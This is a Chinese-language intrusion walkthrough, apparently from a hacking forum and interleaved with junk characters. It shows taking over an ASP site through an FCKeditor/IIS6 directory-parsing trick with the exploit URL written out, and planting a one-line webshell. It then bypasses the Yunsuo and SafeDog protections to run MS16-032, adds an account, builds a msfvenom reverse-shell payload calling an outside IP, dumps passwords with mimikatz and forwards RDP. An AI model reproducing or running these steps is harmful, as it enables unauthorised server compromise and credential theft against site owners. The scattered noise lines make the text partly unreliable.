; l `% `2 S9 `+ c* r- |+ |+ K
! v1 U- l; Z/ _$ p4 y
+ K% m2 ?/ O2 T q0 f1 v # Y3 f9 x+ R$ i9 U
一、 利用getwebshell篇
' [7 I. d, s% h/ P
! Z7 t3 y/ J* R. ~3 r! o3 h9 D7 ?首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
& {- c. b5 \/ Q) n( I8 [$ _5 _
1 B* o/ g s" ^& R2 S: p8 l 5 K+ Q, s! ]2 t# j: c
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 2 E$ G- p2 [+ g& c1 L0 w
 0 A+ `% K6 A( i/ H" [" ?
下面我们构造一个asp目录,如:
9 F c0 ?* u+ u% B7 v/ | , u1 P8 P7 ?" g! B+ k# X% h: L/ p
, W2 N1 k# F7 s j# t. Q3 q http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 : g; l' a% Y6 l6 I5 B0 M5 F
% g: U! K4 j% o. b" @
! i# L* \) q7 L+ I8 e1 j" [8 C
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 1 C4 x6 I9 F, _+ ?! ?8 J2 o
% H% ~4 O+ Q2 U, N
一、 绕过安全狗云锁提权并且加账号
0 R2 S3 g/ K$ l0 _- i 4 d, t K7 f" B( o* V- g6 s5 T1 I4 V
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干 " i: C, h" A$ M; W' G0 O1 @
, ^+ k9 H& C7 ^- l
如图:
6 }9 D" N5 M s- `' o ! |0 h% v+ d, G7 S
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
7 ^' B* S7 Q- U& ]; X* d. J8 z $ V# R( S$ [4 `% e* u) } A! g: G
一、 利用metasploit
0 p0 j) W% B9 o. C ' J. F: o6 P% O% c4 \
首先用pentestbox生成一个64位的payload如下命令 $ B8 A9 F+ @' n0 Q- [- l A
" |, `% {: X) t2 l4 P* T* ?
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe * ~2 J; x J8 @3 T# L1 }& Y' p& y) R
1 v3 g" N4 k7 p为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
! a3 r( t* v8 A! g& @6 ^ + I8 u# M, g3 s. ?1 H. L# F
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: 1 Q+ W9 @9 u+ ?6 {6 k5 q/ O
 Q. k& A- C, o5 P+ l) {
下面我们来做一个监听如下命令: Q# n& v4 S5 F+ A, |; D
' }2 O/ S% B8 A5 Z# i. s2 S7 s( nportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
, [* F3 B# F, V# v3 \
! {8 M. t/ A2 Z 8 C; X3 L; P# [& }1 o
|
$ Z# r& ]# x" L, Z) n1 ^. @